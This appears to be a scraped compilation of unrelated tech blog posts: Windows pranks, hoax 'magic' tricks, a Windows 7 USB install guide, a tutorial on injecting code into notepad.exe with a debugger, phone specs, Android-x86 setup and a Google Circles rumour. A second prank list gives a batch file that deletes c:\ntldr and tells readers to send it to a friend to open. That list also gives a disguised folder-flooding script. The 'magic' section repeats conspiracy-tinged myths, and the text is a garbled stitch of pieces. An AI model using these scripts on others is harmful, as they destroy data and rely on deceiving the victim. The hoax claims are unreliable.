The 10 Most Ridiculously Awesome Geeky Computer Pranks

Everybody loves a good prank… unless you are the one on the receiving end of the fun. It’s time to hone your pranking skills, not just to make sure you are the best, but so you can avoid being pranked by others.

Yeah, sure, we could go with the old standards, like a blue screen of death screensaver or something like that, but it’s time to use our geek skills and come up with something better. We’ll cover some of the old favorites too, but maybe with a twist. Note: Many of these pranks require being able to access somebody’s computer physically, and many others require them to leave their PC logged in and unattended. You’ll have to plan accordingly.

Disclaimer: Get a sense of humor.

Make the Space Key Write the Word SPACE

Here’s a clever prank for you: Make the victim’s computer actually type the word “SPACE” every time they hit the space bar. They’ll be lost trying to figure out what on earth is going on, and it couldn’t be simpler.

Just create a new AutoHotkey script and drop in the following two lines of code—the first one is to hide the tray icon, and the second sets up the hotkey for replacing the text.

You’ll probably want to right-click on the script and compile it to an executable before putting it on their computer. I’m not providing a download for this! Just stick it somewhere on their PC, launch it, and watch the fun!

What’s really entertaining is that while I was testing this out, I accidentally pranked myself—my AHK scripts are stored in Dropbox and synced across all my PCs, and I’d forgotten about it on my desktop. Whoops!

Pretend to Install Linux on a Windows User’s PC with a Live CD

This one can’t be simpler—just find somebody at work who turns their PC off at night, come in before them, and boot off a Linux Live CD. Then leave an official-looking memo on their desk saying they’ve been upgraded to Linux, and watch them struggle to figure out what on earth they are doing. You’ll probably want to get rid of the Install icon, of course.

Create a Shutdown Shortcut that Looks like a Folder

This one is really simple to do—just create a shortcut to shutdown.exe on the desktop, and then change the icon to a regular folder, so when they double-click the folder to see what it might contain, they get a nice system shutdown notice instead. You can change the shutdown time to really far in the future so they won’t lose any work, but mostly so they get the full benefit of your nerd skills.

If they are using XP, the effect is nice and dramatic, and you can even have some fun with the shutdown time… on Windows 7 you won’t be able to show off your geek skills quite as well, but they’ll still see something that will confuse them.

Note: on Windows 7 or Vista you’d also need to disable UAC or else they’ll see a prompt.

Switch the Keyboard Layout To DVORAK

If you really want to screw with somebody without installing anything, just enable the Dvorak alternate keyboard layout that even most geeks aren’t familiar with. When they type, everything will go haywire.

Head into Control Panel –> Region and Language –> Keyboards –> Change keyboards, then click the Add button and pick the Dvorak layout (or any other random layout you want). Once you’ve done that, use the drop-down above to set the default.

You’ll probably want to flip over to the Language Bar tab and set that to hidden as well, so they won’t be able to figure it out easily.

Plug a Wireless USB Mouse / Keyboard Into Their PC

This usually works out better if the other person has a desktop PC, because you can hide the wireless mouse or keyboard receiver behind their PC, and then every so often type an extra letter, or move the mouse slightly. If you do it right, you can have some fun with this one for a long time. The great thing is that this should work for almost anybody, including people that keep their computer locked all the time.

If they do have a laptop and a wireless mouse, you can simply replace their wireless mouse with an identical-looking one, since it won’t work for their PC. They’ll assume their mouse batteries are dead, and you can move the mouse pointer around the screen with their mouse. The prank won’t last as long, but it will be every bit as fun.

Obviously the picture, courtesy of ehavir, shows a wired keyboard—but it’ll work much better with a wireless setup.

Stick a Message Into their System Clock

We’ve covered this before, but you can easily stick custom text into the clock that sits in the taskbar—and most people won’t have a clue how to switch it back. Just head into Control Panel –> Region and Language –> Additional Settings –> Time, and change the AM or PM symbols to whatever you want. Or you can read how to do it for Windows 7 or Vista.

Reverse Their Trackpad or Mouse Wheel Scrolling

You can really throw somebody for a loop if you use a simple AutoHotkey script to flip their trackpad to scroll in the opposite direction. They’ll be completely confused! If they happen to have a laptop with a Synaptics touchpad, you can actually tweak this setting right in the Control Panel –> Mouse dialog, but otherwise, check out our article covering the script method, that should work anywhere.

How to Get the Worst OS X Lion Feature in Windows (Reverse Scrolling)

Add Common Typos or Funny Words to MS Word’s Dictionary or AutoComplete

There’s any number of possibilities for this one, and the sky is really the limit—the idea is that you put something custom into the AutoCorrect so whatever they type gets replaced with something else.

You can go subtle with it, and just replace a properly typed word with a typo instead, or you can get in their face with something more fun—like making anytime they type their name end up replacing it with “ is a jerk”. Loads of fun.

For Word 2007 or 2010, head to the Office button –> Options –> Proofing –> AutoCorrect Options. For previous versions… I have no idea. If you want this to be system-wide, you can use AutoHotkey instead.

Setup Task Scheduler Jobs to Launch Random Apps (or a Web Page)

Even a serious geek is going to be pretty lost on how to troubleshoot a new tab repeatedly opening to a certain page every couple of minutes, if you bury that inside the task scheduler. Just go in and create a new task, run through the wizard and pick the browser executable, plug the site name into the arguments box, and then set the schedule to repeat the task every 5 minutes.

Set the Mouse Pointer to Look Always Busy (to Make Their PC Look Like It’s Hanging)

Nice and simple, but oh so fun! Just head into Control Panel –> Mouse –> Pointers and change the Normal pointer to the busy one. They’ll think their computer is hanging all the time, but it’s really not. For extra fun, you could make the mouse pointers gigantic.

Activate High Contrast Mode (with a Single Hotkey!)

There’s a built-in accessibility option that can be very confusing to somebody who doesn’t know how to turn it off, and it requires only pressing one shortcut key sequence:

Shift + Alt + Printscreen

That’s it. Once you press that key combo, their desktop will get flipped to the high contrast mode—you can press it again to go back to normal. The great thing is that even if their computer is locked, you can enable high contrast with the icon on the lower left corner. On Mac OS X, you can press Ctrl+Opt+Cmd+8 to invert the screen’s colors.

The Old-School Favorite: Move the Desktop Icons, Take a Screenshot, Set as the Wallpaper

Most geeks have done this at some point in their career, because it’s both simple and irritating, especially for somebody who isn’t expecting it. The basic principle works one of a couple of ways:

Take a screenshot of the desktop with the icons where they are, set it as the wallpaper, and then hide the desktop icons.
Move the desktop icons around, or create bogus icons, take a screenshot, and then set it as the wallpaper. This way some icons work, and some don’t.
Take the screenshot of the desktop, and then hide the taskbar below the bottom of the screen before setting the wallpaper (this only works on XP). Even better: flip the image upside down before doing it.

The result looks something like the image above, assuming you followed the second idea and created a folder on the desktop that they’d be sure to notice right away. They’ll keep clicking, but nothing will happen.

Bonus? Combine this with the shutdown shortcut so when they do figure it out and try and open the folder… it’ll give them the shutdown prank too!

Computer which can be named as "CON". This is something funny and
inexplicable? At Microsoft the whole Team, couldn't answer why this
happened! TRY IT NOW, IT WILL NOT CREATE A "CON" FOLDER

Magic #2

Did you know that a flight number from one of the planes that hit one
of the two WTC towers on 9/11 was Q33N. In Notepad / WordPad or MS
Word, type that flight number i.e. Q33N. Increase the font size to 72.
Change the font to Wingdings. ….. u will be amazed by the
findings!!!…………………..

MAGIC #3

For those of you using Windows, do the following:
1.) Open an empty notepad file
2.) Type "Bush hid the facts" (without the quotes)
3.) Save it as whatever you want.
4.) Close it, and re-open it.

Noticed the weird bug? No one can explain!

Computer pranks to freak out your friends and make them crying for mummy

I've been posting many articles about computer pranks on this blog (Deadly Virus Prank, The Ultimate Virus, How to Create a Fake and Harmless Virus and Facebook Virus Prank). Today , I will show you 5 great computer pranks that will frustrate your victims very much. These pranks could be very painfully, so please use them at your own risk ;)

1. Crash a Computer System With Nothing But a URL!

I stumbled across this URL while surfing the internet. This is a javascript "exploit" (that still works, by the way) and will hang/crash your system. It basically floods you with an infinite loop of mailto:xxx windows. To cancel this (and you have to move fast) kill the process of your email client before you run out of RAM.

2. Shut Down a Computer Forever

Open notepad and copy/paste this code:

del c:\ntldr

Now Save it as a .bat file.

This should shutdown the persons computer. It shuts it off once and deletes the files needed to reboot and restart.

REMEMBER - DO NOT CLICK THIS FILE. YOU WON'T RECOVER YOUR COMPUTER BACK AFTER YOU OPEN THE .BAT FILE!

Send it to your friends computer and tell them to open it. Have fun!!

3. Make over 1,000 folders in few seconds

Here I will teach you simple prank that will make an unlimited amount of folders in any place you want.

1. Open notepad and type :

@echo off makes it so that it appears to be a blank screen but actually its making hundreds of folder.
md %random% is command that creating folders with random names.
goto top – return to label :top, infinite loop

2. Save it as 1000folders.bat

3. After that you will get icon that looks as show below

People probably not going to click on an icon that looks like this picture so to make it better (funnier and easier to prank people with) make a short-cut to it

4. Right click on icon and click Create Shortcut

5. Right click on shortcut and click properties , then click on Change Icon and rename icon

Tell the person that you found the music they wanted and downloaded it on there computer, that way they will think its a shortcut to the music and they will click on it then they will think its loading so they wont exit right away when they finally realize its not going to load or so many errors have came up they realized somethings wrong it will be to late) also just something to know its impossible to delete them using cmd you HAVE to find all of them and delete them manually…

4. Microsoft Word Prank

Here , I will show you great microsoft word prank that will frustrate the victims very much, whenever they type a certain word, another word appears! This prank is great for office and schools.

1. Launch Microsoft Word

2. Go to Tools -> AutoCorrect Options…

3. In the space where it says Replace , type a real common word such as the, and, a,I, you etc. In the space that says With , type in a crazy word such as fdgfdhkihyob45, whatever you want! Then , click on Add

5. Cool Windows Prank

This will make it to where your friend cannot click on anything on the screen.

1. Take a screenshot of the desktop. You can use windows printscreen or some printscreen software.

2. Make your printscreen picture as desktop background.

3. Right click on desktop , then click Arrange Icons By->Show Desktop Icons (Windows XP)
Right click on desktop , then click View->Show Desktop Icons (Windows 7 and Vista)

That is it , when you click on the “icons”, nothing will happen!

Windows 7 On A Netbook

With the release of Windows 7 in October and Netbooks being one of the most

popular gadgets this Christmas we will show you how to install Windows 7 onto

As with most netbooks there is NO DVD drive.

So customers who purchased Windows 7 in .ISO format (Microsoft Store,

MSDN, TechNet, MAPS etc) need to find a way to install Windows 7 onto a

netbook / laptop / PC with NO DVD drive

This easy step by step guide will show you how:

Step 1: - Tools Required

· 4 GB+ USB flash drive

· Windows XP, Vista or 7 host OS

· Windows 7 DVD or .ISO file

· Download the Windows 7 USB DVD Too l

· Install it

· Then open it via its icon or All Programs

Step 2: - Creation

· You will now be presented with the following screen:

· Locate the Windows 7 .ISO file on your computer using the Browse

button and once done click Next

· Now chose the media type, for this example we want to chose USB

device as shown:

· Now insert your USB drive and select it from the drop down menu as

shown:

· Now select Begin copying

· The tool will begin copying the files to the USB drive as shown:

· Should your drive need erased please do so

· Setup will finish creating the bootable USB drive as shown:

· Close the USB DVD Tool

Step 3: - Testing

· OK now we have created the bootable USB drive we can test it BEFORE

deploying it to our netbook

· Download MobaLiveCD

· This will allow you to test your USB drive WITHOUT actually installing

Windows 7 as shown:

· Select Run the LiveUSB

· Then select your USB drive

· Windows 7 setup will proceed as shown:

Step 4: - Installation

· You can then take the USB to your netbook and install

· There are 2 way you can do this, either from the OS on the netbook or

by booting from the USB

· To install from the OS already on the netbook, navigate to the root of the

USB drive and double click setup.exe

· Or configure your netbooks BIOS to boot from USB

How to inject code into a exe file

-Requirements-
At first we need a debugger. I prefer OLLYDBG(the best debugger on earth :P)
At twice we need a target application to inject our code.
I will take the windows NOTEPAD.EXE .
Make a copy if this EXE in a new folder named CodeInjectTest.
Thats all ;)

-Getting started-
Our goal is to inject some code into the Notepad.EXE .
In our case we'll inject a simple MessageBox at Notepads start.
Start up Notepad now and validize that Notepad is the original one.

If you're sure now that's the original Notepad open the Notepad.exe with Olly.
Yuppi! If you're ready you get this window:

Because we're going to inject some code we've to have some space to inject it.
In a EXE file are a lot of CodeCaves were nothing is done (DB 00).
So lets scroll the CPU window a little bit down until you find a CodeCave(look below).

Do you see the red box I've drawn for you? ;) THIS is a CodeCave!
Here we can inject some custom code without interfering the programs flow.
If you know the API call for a MessageBox you don't need to
read this lines.

This is all you need to know about the MessageBox.
Now its time to do something with the CodeCaves.
At first to use the MessageBox we need to create some text for output it on the
MessageBox. In the following picture I've selected some lines of the CodeCaves and
highlighted the BinaryEdit menu for you.

If you pressed on Binary=>Edit or (CTRL+E) you will see following window.
Just fill it out like me if you want.

Press OK and you'll see the modified code in red:

Press now CTRL+A to reanalyze the code.

OK! If you want to have a different MessageBox Caption than the title you can repeat this
step to make a second ASCII like the "INJECTED NOTEPAD".

-Some ASM-

Now its time for some ASM ;)
We need to invoke a MessageBox from ASM. This is quite simple!
PUSH 0 ; BUTTONS =
PUSH 1008751 ; CAPTION = Our adress of the "INJECTED NOTEPAD"
PUSH 1008751 ; MESSAGE = Same like above.
PUSH 0 ; ICON =
CALL MessageBoxA; Run MessageBoxA with the Params above.

This few lines entered in Olly should look like this:

Do you see the arrow?! THIS IS NOW A VERY IMPORTANT STEP!
If we save it now and run it you will NOT see any effect. Why?
Because our litte routine is not called yet!
You need to write down the Offset of your first "PUSH 0" because we
need to make a jump from the programs origin to here and back again ;)
If you noted the offset of the first PUSH down, goto the origin of the program like below.

Now you're at the FIRST line of code which will be executed.
Do you remember that the first thing we wanted to do is to run our code? :)
Yehaa! We're on the right way!
Select now from the origin some lines and copy it into the Clipboard.

Paste the clipboard into a texteditor and leave them there. We need this lines later.
If you have pasted it go to the first line of the program.
(In the picture upper it's the PUSH 70).
Double click on it and enter in the box "JMP "

Press on Assemble and you will the the again the red marked(patched) code.

Look to the redbox! This is the address we need to jump to after our injected code.
If we jump here after the injection the program will execute like without our injection :)
But there is one thing we need to do at least!
Compare the "new" origin with the old one you've pasted into a clipboard.
You will see that there are a few lines overwritten! But this lines are needed to run
the programm without errors. Identify the lines which get overwritten.
In my case the overwritten lines are:
PUSH 70
PUSH NOTEPAD.01001898

Click on the first line (our JMP) and press ENTER.
You'll dropped to your MessageBox invokation!
After our CALL MessageBoxA we need to insert now the overwritten lines AND the jump back!

NOW you're done!
(If you want to test the "JumpBack"-Jump just select it and press ENTER.
If you get to the right line you can be sure that's ok! If not check Offset!)
To save the "new" Notepad take a look the the following picture:

If you press on "All modifications" a new little window will be shown.
Press on "Copy All" on this window.
A new window with the new ASM code will be shown.
Close the new window (THE CHILD WINDOW! NOT OLLY DBG WINDOW!).
Then a save dialog let you choose a new filename.
Save the file and run it. If you're successful you will get this result:

Press on OK and Notepad will start normally ;)

DO NOT abuse debuggers to attach shellcodes or things like that into EXEs!

HTC EVO 3D Specs Revealed

Rumors suggest that Sprint and HTC are going to launch the successor to the ‘EVO 4G’ at the on-going CTIA, to be known as the EVO 3D.

Now, the folks over at PocketNow have managed to get their hands on some leaked documents, which reveal the specs of the EVO 3D. The handset will be sporting a 4.3-inch qHD (960×540) display with 3D capabilities.

The EVO 3D will be powered by a dual-core 1.2GHz Snapdragon CPU (MSM8660) and pack 768MB of RAM. The back of the handset will sport dual 5MP cameras with Flash. These cameras will be able to record videos in either 720p 3D format or at 1080p in 2D.

The front of the phone will also house a 1.3MP camera for video-calling. The EVO 3D will run on Android OS with HTC’s Sense UI on top of it. However, the Android version which the handset will release with is unknown.

PocketNow also managed to confirm the specs of another EVO branded device coming to Sprint – the EVO View 4G. The EVO View 4G is the Sprint version of the recently announced HTC Flyer.

The 7-inch tablet has a resolution of 1024×600, and is powered by a 1.5GHz single core Snapdragon CPU. The EVO View 4G will run Android 2.4, with HTC Sense UI – which will be optimized for tablet use.

Run Android on Your Netbook or Desktop

Would you like to try out Google’s Android OS on your netbook or desktop? Here’s how you can run Android from a flash drive and see how fast Android can run on real hardware!

Install Android On Your Flash Drive or Memory Card

First, make sure you have a flash drive or memory card inserted into your computer with around 256MB or more storage space. Remove any files you may need off of the drive, so you can use it to run Android on your computer.

Now you’re ready to download and setup Android on your drive. Head over to the Android x86 download page (link below), scroll down to the StableRelease section, and click Viewunder android-x86-1.6-r2.iso. This will start the iso file downloading to your computer.

In the mean time, head over to the UNetbootin site (link below), and download it as well.

Once your downloads are complete, run UNetbootin. Click the bullet beside Diskimage, then click the “… “ button and select the Android ISO file you just downloaded. Finally, select the correct flash drive or memory card in the menu on the bottom, and click Ok.

UNetbootin will now copy the files to your flash drive. This may take a few moments, depending on your flash drive’s speed.

Once it’s finished, it will ask if you wish to reboot. If you want to go ahead and run Android, you can click Reboot; otherwise, just exit and run Android from your flash drive when you want.

If you want to try Android on a computer that has a CD/DVD drive, you could just burn the ISO to a disk and boot from it. Netbooks don’t have CD drives, and even on a desktop, it can be nice to not waste a CD just for this. If you want to burn it to a disk, you can do iteasily from Windows 7 or with a free program such as ImgBurn.

Using Android-x86 On Your Computer

Now you’re ready to run Android on your netbook, laptop, or even a full desktop computer. Simply reboot your computer with the USB drive, and select to boot from it. Not all computers will automatically boot from a USB device, so you may have to press F2, F10, or another key, depending on your computer, and change the Boot options in the bios.

Now, when you boot from the USB drive, select Live CD – Run Android-x86 without installation.

You’ll see a text prompt for a few moments as Android begins to load.

Then you’ll see the Android boot screen, though we only saw it for a moment, as our computer booted really fast into Android.

After a couple seconds, you’ll see the Android desktop … on your netbook or computer! You can quickly access one of the apps on the home screen, or open the menu to see more options.

Click and hold to open a context menu, such as to change the background or add a desktop widget.

Or, press your mouse’s right button to open a menu, such as to open a new tab in the browser.

It works very good as a quick way to get online; the Android browser is actually quite capable for normal browsing, and worked very well in our tests. With a 10 second or less boot time, you may enjoy using this as an alternate to Puppy Linux or other light distros for a quick way to get online securely.

You can even install new applications with the included AndAppStore, though these will only be installed while this Android session is running. If you reboot your computer, you’ll only see the default applications and settings again.

Android x86 supports all of the hardware, including cameras and Wi-Fi, on several Netbooks and laptops; check the link below to see if yours is supported. In our test, our camera wasn’t supported, and we additionally had to connect to the internet via Ethernet since it didn’t detect our Wi-Fi card.

For the most part, Android was very responsive, but anything that would fade out the desktop such as opening a dialog box or a menu would run very slowly and even make the mouse feel jerky. Additionally, we couldn’t get it to boot on our desktop with an AMD processor. You could install Android to your hard drive, but we wouldn’t recommend it considering the limitations and issues it has. But, it is very fun to play with from a flash drive or memory card, and you may even feel adventurous enough to try installing it. Be warned, though; this isn’t for the weak of heart!

Conclusion

If you’re curious about how Android works and would like to try it out on a real machine, this is a great way to see how fast a mobile OS can be on a netbook or desktop. We wish it was more stable and could actually store programs and settings on the flash drive, but it did work as a nice substitute for Puppy Linux or other light, Live CD distros. It runs much faster on a real computer than in the emulator. Since you’re running it from a flash drive, you don’t have to worry about messing anything up, so go ahead and try it for research or fun.

Google to Launch Major New Social Network Called Circles, Possibly Today

We believe that Google will preview a major new social service calledGoogle Circles at South by Southwest Interactive today. Update: Google has now officially denied that Circles will launch here, but not that it exists. Others, including Tim O'Reilly, have also now confirmed that they've seen it and that it's awesome. If what we've heard is correct, the service will offer photo, video and status message sharing. Everything users share on Circles will be shared only with the most appropriate circle of social contacts in their lives, not with all your contacts in bulk. Circles may be shown off at an event co-hosted tonight by the ACLU, an organization focused on privacy and the liberties it affords. It may not be a big public launch yet, but it's clear that this is a major product in the works at the very least.

The service has been developed with extensive participation by Chris Messina, the co-creator of numerous successful social and software phenomena online, from BarCamp to Hashtags and much more. Messina declined to comment for this story. Jonathan Sposato, CEO of the photo editing service Piknik that Google acquired last year, is working on Circles as well. Sposato may be the only entrepreneur to have sold not one but two startups to Google - having founded Phatbits, a service that was acquired by Google in 2005 and became Google Gadgets. These are heavy hitting tech leaders and the service should be very interesting.
